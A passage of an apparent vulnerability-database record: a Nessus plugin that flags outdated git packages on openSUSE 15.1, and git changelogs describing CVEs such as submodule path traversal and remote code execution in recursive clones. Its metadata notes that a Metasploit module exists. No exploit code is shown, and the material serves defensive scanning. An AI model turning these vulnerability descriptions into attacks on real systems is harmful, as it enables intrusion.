mode now handles octopus\n merges as well.\n\n - Add a server-side knob to skip commits in\n exponential/fibbonacci stride in an attempt to cover\n wider swath of history with a smaller number of\n iterations, potentially accepting a larger packfile\n transfer, instead of going back one commit a time during\n common ancestor discovery during the 'git fetch'\n transaction. 
(merge 42cc7485a2\n jt/fetch-negotiator-skipping later to maint).\n\n - A new configuration variable core.usereplacerefs has\n been added, primarily to help server installations that\n want to ignore the replace mechanism altogether.\n\n - Teach 'git tag -s' etc. a few configuration variables\n (gpg.format that can be set to 'openpgp' or 'x509', and\n gpg.<format>.program that is used to specify what\n program to use to deal with the format) to allow x.509\n certs with CMS via 'gpgsm' to be used instead of openpgp\n via 'gnupg'.\n\n - Many more strings are prepared for l10n.\n\n - 'git p4 submit' learns to ask its own pre-submit hook if\n it should continue with submitting.\n\n - The test performed at the receiving end of 'git push' to\n prevent bad objects from entering repository can be\n customized via receive.fsck.* configuration variables;\n we now have gained a counterpart to do the same on the\n 'git fetch' side, with fetch.fsck.* configuration\n variables.\n\n - 'git pull --rebase=interactive' learned 'i' as a\n short-hand for 'interactive'.\n\n - 'git instaweb' has been adjusted to run better with\n newer Apache on RedHat based distros.\n\n - 'git range-diff' is a reimplementation of 'git tbdiff'\n that lets us compare individual patches in two\n iterations of a topic.\n\n - The sideband code learned to optionally paint selected\n keywords at the beginning of incoming lines on the\n receiving end.\n\n - 'git branch --list' learned to take the default sort\n order from the 'branch.sort' configuration variable,\n just like 'git tag --list' pays attention to 'tag.sort'.\n\n - 'git worktree' command learned '--quiet' option to make\n it less verbose.\n\ngit 2.18.0 :\n\n - improvements to rename detection logic\n\n - When built with more recent cURL, GIT_SSL_VERSION can\n now specify 'tlsv1.3' as its value.\n\n - 'git mergetools' learned talking to guiffy.\n\n - various other workflow improvements and fixes\n\n - performance improvements and other developer 
visible\n fixes\n\ngit 2.17.1\n\n - Submodule 'names' come from the untrusted .gitmodules\n file, but we blindly append them to $GIT_DIR/modules to\n create our on-disk repo paths. This means you can do bad\n things by putting '../' into the name. We now enforce\n some rules for submodule names which will cause Git to\n ignore these malicious names (CVE-2018-11235,\n bsc#1095219)\n\n - It was possible to trick the code that sanity-checks\n paths on NTFS into reading random piece of memory\n (CVE-2018-11233, bsc#1095218)\n\n - Support on the server side to reject pushes to\n repositories that attempt to create such problematic\n .gitmodules file etc. as tracked contents, to help\n hosting sites protect their customers by preventing\n malicious contents from spreading.\n\ngit 2.17.0 :\n\n - 'diff' family of commands learned\n '--find-object=<object-id>' option to limit the findings\n to changes that involve the named object.\n\n - 'git format-patch' learned to give 72-cols to diffstat,\n which is consistent with other line length limits the\n subcommand uses for its output meant for e-mails.\n\n - The log from 'git daemon' can be redirected with a new\n option; one relevant use case is to send the log to\n standard error (instead of syslog) when running it from\n inetd.\n\n - 'git rebase' learned to take '--allow-empty-message'\n option.\n\n - 'git am' has learned the '--quit' option, in addition to\n the existing '--abort' option; having the pair mirrors a\n few other commands like 'rebase' and 'cherry-pick'.\n\n - 'git worktree add' learned to run the post-checkout\n hook, just like 'git clone' runs it upon the initial\n checkout.\n\n - 'git tag' learned an explicit '--edit' option that\n allows the message given via '-m' and '-F' to be further\n edited.\n\n - 'git fetch --prune-tags' may be used as a handy\n short-hand for getting rid of stale tags that are\n locally held.\n\n - The new '--show-current-patch' option gives an end-user\n facing way to get the diff 
being applied when 'git\n rebase' (and 'git am') stops with a conflict.\n\n - 'git add -p' used to offer '/' (look for a matching\n hunk) as a choice, even there was only one hunk, which\n has been corrected. Also the single-key help is now\n given only for keys that are enabled (e.g. help for '/'\n won't be shown when there is only one hunk).\n\n - Since Git 1.7.9, 'git merge' defaulted to --no-ff (i.e.\n even when the side branch being merged is a descendant\n of the current commit, create a merge commit instead of\n fast-forwarding) when merging a tag object. This was\n appropriate default for integrators who pull signed tags\n from their downstream contributors, but caused an\n unnecessary merges when used by downstream contributors\n who habitually 'catch up' their topic branches with\n tagged releases from the upstream. Update 'git merge' to\n default to --no-ff only when merging a tag object that\n does *not* sit at its usual place in refs/tags/\n hierarchy, and allow fast-forwarding otherwise, to\n mitigate the problem.\n\n - 'git status' can spend a lot of cycles to compute the\n relation between the current branch and its upstream,\n which can now be disabled with '--no-ahead-behind'\n option.\n\n - 'git diff' and friends learned funcname patterns for Go\n language source files.\n\n - 'git send-email' learned '--reply-to=<address>' option.\n\n - Funcname pattern used for C# now recognizes 'async'\n keyword.\n\n - In a way similar to how 'git tag' learned to honor the\n pager setting only in the list mode, 'git config'\n learned to ignore the pager setting when it is used for\n setting values (i.e. 
when the purpose of the operation\n is not to 'show').\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1110949\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112230\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114225\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1132350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1149792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1156651\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158785\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158787\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158788\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158789\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158791\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1167890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1168930\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169605\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169786\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169936\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19604\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-arch\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/01\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-arch-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-core-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-core-debuginfo-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-credential-gnome-keyring-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-credential-gnome-keyring-debuginfo-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-credential-libsecret-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", 
reference:\"git-credential-libsecret-debuginfo-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-cvs-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-daemon-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-daemon-debuginfo-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-debuginfo-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-debugsource-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-email-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-gui-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-p4-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-svn-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-svn-debuginfo-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-web-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"gitk-2.26.1-lp151.4.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git / git-arch / git-core / git-core-debuginfo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-15T13:46:18", "description": "This update for git fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2020-5260: With a crafted URL that contains a newline in it, the credential helper machinery can be fooled to give credential information for a wrong host (bsc#1168930).\n\nNon-security issue fixed :\n\ngit was updated to 2.26.0 for SHA256 support (bsc#1167890, 
jsc#SLE-11608): the xinetd snippet was removed\n\nthe System V init script for the git-daemon was replaced by a systemd service file of the same name.\n\ngit 2.26.0: 'git rebase' now uses a different backend that is based on the 'merge' machinery by default. The 'rebase.backend' configuration variable reverts to old behaviour when set to 'apply'\n\nImproved handling of sparse checkouts\n\nImprovements to many commands and internal features\n\ngit 2.25.1: 'git commit' now honors advise.statusHints\n\nvarious updates, bug fixes and documentation updates\n\ngit 2.25.0: The branch description ('git branch --edit-description') has been used to fill the body of the cover letters by the format-patch command; this has been enhanced so that the subject can also be filled.\n\nA few commands learned to take the pathspec from the standard input or a named file, instead of taking it as the command line arguments, with the '--pathspec-from-file' option.\n\nTest updates to prepare for SHA-2 transition continues.\n\nRedo 'git name-rev' to avoid recursive calls.\n\nWhen all files from some subdirectory were renamed to the root directory, the directory rename heuristics would fail to detect that as a rename/merge of the subdirectory to the root directory, which has been corrected.\n\nHTTP transport had possible allocator/deallocator mismatch, which has been corrected.\n\ngit 2.24.1: CVE-2019-1348: The --export-marks option of fast-import is exposed also via the in-stream command feature export-marks=... 
and it allows overwriting arbitrary paths (bsc#1158785)\n\nCVE-2019-1349: on Windows, when submodules are cloned recursively, under certain circumstances Git could be fooled into using the same Git directory twice (bsc#1158787)\n\nCVE-2019-1350: Incorrect quoting of command-line arguments allowed remote code execution during a recursive clone in conjunction with SSH URLs (bsc#1158788)\n\nCVE-2019-1351: on Windows mistakes drive letters outside of the US-English alphabet as relative paths (bsc#1158789)\n\nCVE-2019-1352: on Windows was unaware of NTFS Alternate Data Streams (bsc#1158790)\n\nCVE-2019-1353: when run in the Windows Subsystem for Linux while accessing a working directory on a regular Windows drive, none of the NTFS protections were active (bsc#1158791)\n\nCVE-2019-1354: on Windows refuses to write tracked files with filenames that contain backslashes (bsc#1158792)\n\nCVE-2019-1387: Recursive clones vulnerability that is caused by too-lax validation of submodule names, allowing very targeted attacks via remote code execution in recursive clones (bsc#1158793)\n\nCVE-2019-19604: a recursive clone followed by a submodule update could execute code contained within the repository without the user explicitly having asked for that (bsc#1158795)\n\nFix building with asciidoctor and without DocBook4 stylesheets.\n\ngit 2.24.0 The command line parser learned '--end-of-options' notation.\n\nA mechanism to affect the default setting for a (related) group of configuration variables is introduced.\n\n'git fetch' learned '--set-upstream' option to help those who first clone from their private fork they intend to push to, add the true upstream via 'git remote add' and then 'git fetch' from it.\n\nfixes and improvements to UI, workflow and features, bash completion fixes\n\npart of it merged upstream\n\nthe Makefile attempted to download some documentation, banned\n\ngit 2.23.0: The '--base' option of 'format-patch' computed the patch-ids for prerequisite patches in an 
unstable way, which has been updated to compute in a way that is compatible with 'git patch-id\n\n--stable'.\n\nThe 'git log' command by default behaves as if the --mailmap option was given.\n\nfixes and improvements to UI, workflow and features\n\ngit 2.22.1: A relative pathname given to 'git init\n--template=<path><repo>' ought to be relative to the directory 'git init' gets invoked in, but it instead was made relative to the repository, which has been corrected.\n\n'git worktree add' used to fail when another worktree connected to the same repository was corrupt, which has been corrected.\n\n'git am -i --resolved' segfaulted after trying to see a commit as if it were a tree, which has been corrected.\n\n'git merge --squash' is designed to update the working tree and the index without creating the commit, and this cannot be countermanded by adding the '--commit' option; the command now refuses to work when both options are given.\n\nUpdate to Unicode 12.1 width table.\n\n'git request-pull' learned to warn when the ref we ask them to pull from in the local repository and in the published repository are different.\n\n'git fetch' into a lazy clone forgot to fetch base objects that are necessary to complete delta in a thin packfile, which has been corrected.\n\nThe URL decoding code has been updated to avoid going past the end of the string while parsing %-<hex>-<hex> sequence.\n\n'git clean' silently skipped a path when it cannot lstat() it; now it gives a warning.\n\n'git rm' to resolve a conflicted path leaked an internal message 'needs merge' before actually removing the path, which was confusing.\nThis has been corrected.\n\nMany more bugfixes and code cleanups.\n\nremoval of SuSEfirewall2 service, since SuSEfirewall2 has been replaced by firewalld, see [1]. 
[1]:\nhttps://lists.opensuse.org/opensuse-factory/2019-01/msg00490.html\n\ngit 2.22.0: The filter specification '--filter=sparse:path=<path>' used to create a lazy/partial clone has been removed. Using a blob that is part of the project as sparse specification is still supported with the '--filter=sparse:oid=<blob>' option\n\n'git checkout --no-overlay' can be used to trigger a new mode of checking out paths out of the tree-ish, that allows paths that match the pathspec that are in the current index and working tree and are not in the tree-ish.\n\nFour new configuration variables {author,committer}.{name,email} have been introduced to override user.{name,email} in more specific cases.\n\n'git branch' learned a new subcommand '--show-current'.\n\nThe command line completion (in contrib/) has been taught to complete more subcommand parameters.\n\nThe completion helper code now pays attention to repository-local configuration (when available), which allows --list-cmds to honour a repository specific setting of completion.commands, for example.\n\nThe list of conflicted paths shown in the editor while concluding a conflicted merge was shown above the scissors line when the clean-up mode is set to 'scissors', even though it was commented out just like the list of updated paths and other information to help the user explain the merge better.\n\n'git rebase' that was reimplemented in C did not set ORIG_HEAD correctly, which has been corrected.\n\n'git worktree add' used to do a 'find an available name with stat and then mkdir', which is race-prone. This has been fixed by using mkdir and reacting to EEXIST in a loop.\n\nupdate git-web AppArmor profile for bash and tar usrMerge (bsc#1132350)\n\ngit 2.21.0: Historically, the '-m' (mainline) option can only be used for 'git cherry-pick' and 'git revert' when working with a merge commit. 
This version of Git no longer warns or errors out when working with a single-parent commit, as long as the argument to the '-m' option is 1 (i.e. it has only one parent, and the request is to pick or revert relative to that first parent). Scripts that relied on the behaviour may get broken with this change.\n\nSmall fixes and features for fast-export and fast-import.\n\nThe 'http.version' configuration variable can be used with recent enough versions of cURL library to force the version of HTTP used to talk when fetching and pushing.\n\n'git push $there $src:$dst' rejects when $dst is not a fully qualified refname and it is not clear what the end user meant.\n\nUpdate 'git multimail' from the upstream.\n\nA new date format '--date=human' that morphs its output depending on how far the time is from the current time has been introduced.\n'--date=auto:human' can be used to use this new format (or any existing format) when the output is going to the pager or to the terminal, and otherwise the default format.\n\nFix worktree creation race (bsc#1114225).\n\ngit 2.20.1: portability fixes\n\n'git help -a' did not work well when an overly long alias was defined\n\nno longer squelched an error message when the run_command API failed to run a missing command\n\ngit 2.20.0: 'git help -a' now gives verbose output (same as 'git help\n-av'). Those who want the old output may say 'git help --no-verbose\n-a'..\n\n'git send-email' learned to grab address-looking string on any trailer whose name ends with '-by'.\n\n'git format-patch' learned new '--interdiff' and '--range-diff' options to explain the difference between this version and the previous attempt in the cover letter (or after the three-dashes as a comment).\n\nDeveloper builds now use -Wunused-function compilation option.\n\nFix a bug in which the same path could be registered under multiple worktree entries if the path was missing (for instance, was removed manually). 
Also, as a convenience, expand the number of cases in which\n\n--force is applicable.\n\nThe overly large Documentation/config.txt file have been split into million little pieces. This potentially allows each individual piece to be included into the manual page of the command it affects more easily.\n\nMalformed or crafted data in packstream can make our code attempt to read or write past the allocated buffer and abort, instead of reporting an error, which has been fixed.\n\nFix for a long-standing bug that leaves the index file corrupt when it shrinks during a partial commit.\n\n'git merge' and 'git pull' that merges into an unborn branch used to completely ignore '--verify-signatures', which has been corrected.\n\n...and much more features and fixes\n\nfix CVE-2018-19486 (bsc#1117257)\n\ngit 2.19.2: various bug fixes for multiple subcommands and operations\n\ngit 2.19.1: CVE-2018-17456: Specially crafted .gitmodules files may have allowed arbitrary code execution when the repository is cloned with\n\n--recurse-submodules (bsc#1110949)\n\ngit 2.19.0: 'git diff' compares the index and the working tree. For paths added with intent-to-add bit, the command shows the full contents of them as added, but the paths themselves were not marked as new files. They are now shown as new by default.\n\n'git apply' learned the '--intent-to-add' option so that an otherwise working-tree-only application of a patch will add new paths to the index marked with the 'intent-to-add' bit.\n\n'git grep' learned the '--column' option that gives not just the line number but the column number of the hit.\n\nThe '-l' option in 'git branch -l' is an unfortunate short-hand for '--create-reflog', but many users, both old and new, somehow expect it to be something else, perhaps '--list'. 
This step warns when '-l' is used as a short-hand for '--create-reflog' and warns about the future repurposing of the it when it is used.\n\nThe userdiff pattern for .php has been updated.\n\nThe content-transfer-encoding of the message 'git send-email' sends out by default was 8bit, which can cause trouble when there is an overlong line to bust RFC 5322/2822 limit. A new option 'auto' to automatically switch to quoted-printable when there is such a line in the payload has been introduced and is made the default.\n\n'git checkout' and 'git worktree add' learned to honor checkout.defaultRemote when auto-vivifying a local branch out of a remote tracking branch in a repository with multiple remotes that have tracking branches that share the same names. (merge 8d7b558bae ab/checkout-default-remote later to maint).\n\n'git grep' learned the '--only-matching' option.\n\n'git rebase --rebase-merges' mode now handles octopus merges as well.\n\nAdd a server-side knob to skip commits in exponential/fibbonacci stride in an attempt to cover wider swath of history with a smaller number of iterations, potentially accepting a larger packfile transfer, instead of going back one commit a time during common ancestor discovery during the 'git fetch' transaction. (merge 42cc7485a2 jt/fetch-negotiator-skipping later to maint).\n\nA new configuration variable core.usereplacerefs has been added, primarily to help server installations that want to ignore the replace mechanism altogether.\n\nTeach 'git tag -s' etc. a few configuration variables (gpg.format that can be set to 'openpgp' or 'x509', and gpg.<format>.program that is used to specify what program to use to deal with the format) to allow x.509 certs with CMS via 'gpgsm' to be used instead of openpgp via 'gnupg'. 
</format>\n\nMany more strings are prepared for l10n.\n\n'git p4 submit' learns to ask its own pre-submit hook if it should continue with submitting.\n\nThe test performed at the receiving end of 'git push' to prevent bad objects from entering repository can be customized via receive.fsck.* configuration variables; we now have gained a counterpart to do the same on the 'git fetch' side, with fetch.fsck.* configuration variables.\n\n'git pull --rebase=interactive' learned 'i' as a short-hand for 'interactive'.\n\n'git instaweb' has been adjusted to run better with newer Apache on RedHat based distros.\n\n'git range-diff' is a reimplementation of 'git tbdiff' that lets us compare individual patches in two iterations of a topic.\n\nThe sideband code learned to optionally paint selected keywords at the beginning of incoming lines on the receiving end.\n\n'git branch --list' learned to take the default sort order from the 'branch.sort' configuration variable, just like 'git tag --list' pays attention to 'tag.sort'.\n\n'git worktree' command learned '--quiet' option to make it less verbose.\n\ngit 2.18.0: improvements to rename detection logic\n\nWhen built with more recent cURL, GIT_SSL_VERSION can now specify 'tlsv1.3' as its value.\n\n'git mergetools' learned talking to guiffy.\n\nvarious other workflow improvements and fixes\n\nperformance improvements and other developer visible fixes\n\nUpdate to git 2.16.4: security fix release\n\ngit 2.17.1: Submodule 'names' come from the untrusted .gitmodules file, but we blindly append them to $GIT_DIR/modules to create our on-disk repo paths. This means you can do bad things by putting '../' into the name. 
We now enforce some rules for submodule names which will cause Git to ignore these malicious names (CVE-2018-11235, bsc#1095219)\n\nIt was possible to trick the code that sanity-checks paths on NTFS into reading random piece of memory (CVE-2018-11233, bsc#1095218)\n\nSupport on the server side to reject pushes to repositories that attempt to create such problematic .gitmodules file etc. as tracked contents, to help hosting sites protect their customers by preventing malicious contents from spreading.\n\ngit 2.17.0: 'diff' family of commands learned '--find-object=<object-id>' option to limit the findings to changes that involve the named object. </object-id>\n\n'git format-patch' learned to give 72-cols to diffstat, which is consistent with other line length limits the subcommand uses for its output meant for e-mails.\n\nThe log from 'git daemon' can be redirected with a new option; one relevant use case is to send the log to standard error (instead of syslog) when running it from inetd.\n\n'git rebase' learned to take '--allow-empty-message' option.\n\n'git am' has learned the '--quit' option, in addition to the existing '--abort' option; having the pair mirrors a few other commands like 'rebase' and 'cherry-pick'.\n\n'git worktree add' learned to run the post-checkout hook, just like 'git clone' runs it upon the initial checkout.\n\n'git tag' learned an explicit '--edit' option that allows the message given via '-m' and '-F' to be further edited.\n\n'git fetch --prune-tags' may be used as a handy short-hand for getting rid of stale tags that are locally held.\n\nThe new '--show-current-patch' option gives an end-user facing way to get the diff being applied when 'git rebase' (and 'git am') stops with a conflict.\n\n'git add -p' used to offer '/' (look for a matching hunk) as a choice, even there was only one hunk, which has been corrected. Also the single-key help is now given only for keys that are enabled (e.g. 
help for '/' won't be shown when there is only one hunk).\n\nSince Git 1.7.9, 'git merge' defaulted to --no-ff (i.e. even when the side branch being merged is a descendant of the current commit, create a merge commit instead of fast-forwarding) when merging a tag object.\nThis was appropriate default for integrators who pull signed tags from their downstream contributors, but caused an unnecessary merges when used by downstream contributors who habitually 'catch up' their topic branches with tagged releases from the upstream. Update 'git merge' to default to --no-ff only when merging a tag object that does *not* sit at its usual place in refs/tags/ hierarchy, and allow fast-forwarding otherwise, to mitigate the problem.\n\n'git status' can spend a lot of cycles to compute the relation between the current branch and its upstream, which can now be disabled with '--no-ahead-behind' option.\n\n'git diff' and friends learned funcname patterns for Go language source files.\n\n'git send-email' learned '--reply-to=<address>' option.\n\nFuncname pattern used for C# now recognizes 'async' keyword.\n\nIn a way similar to how 'git tag' learned to honor the pager setting only in the list mode, 'git config' learned to ignore the pager setting when it is used for setting values (i.e. 
when the purpose of the operation is not to 'show').\n\nUse %license instead of %doc [bsc#1082318]\n\ngit 2.16.3: 'git status' after moving a path in the working tree (hence making it appear 'removed') and then adding with the -N option (hence making that appear 'added') detected it as a rename, but did not report the old and new pathnames correctly.\n\n'git commit --fixup' did not allow '-m<message>' option to be used at the same time; allow it to annotate resulting commit with more text.\n\nWhen resetting the working tree files recursively, the working tree of submodules are now also reset to match.\n\nFix for a commented-out code to adjust it to a rather old API change around object ID.\n\nWhen there are too many changed paths, 'git diff' showed a warning message but in the middle of a line.\n\nThe http tracing code, often used to debug connection issues, learned to redact potentially sensitive information from its output so that it can be more safely sharable.\n\nCrash fix for a corner case where an error codepath tried to unlock what it did not acquire lock on.\n\nThe split-index mode had a few corner case bugs fixed.\n\nAssorted fixes to 'git daemon'.\n\nCompletion of 'git merge -s<strategy>' (in contrib/) did not work well in non-C locale.\n\nWorkaround for segfault with more recent versions of SVN.\n\nRecently introduced leaks in fsck have been plugged.\n\nTravis CI integration now builds the executable in 'script' phase to follow the established practice, rather than during 'before_script' phase. 
This allows the CI categorize the failures better ('failed' is project's fault, 'errored' is build environment's).\n\nDrop superfluous xinetd snippet, no longer used (bsc#1084460)\n\nBuild with asciidoctor for the recent distros (bsc#1075764)\n\nMove %{?systemd_requires} to daemon subpackage\n\nCreate subpackage for libsecret credential helper.\n\ngit 2.16.2: An old regression in 'git describe --all $annotated_tag^0' has been fixed.\n\n'git svn dcommit' did not take into account the fact that a svn+ssh:// URL with a username@ (typically used for pushing) refers to the same SVN repository without the username@ and failed when svn.pushmergeinfo option is set.\n\n'git merge -Xours/-Xtheirs' learned to use our/their version when resolving a conflicting updates to a symbolic link.\n\n'git clone $there $here' is allowed even when here directory exists as long as it is an empty directory, but the command incorrectly removed it upon a failure of the operation.\n\n'git stash -- <pathspec>' incorrectly blew away untracked files in the directory that matched the pathspec, which has been corrected.\n\n'git add -p' was taught to ignore local changes to submodules as they do not interfere with the 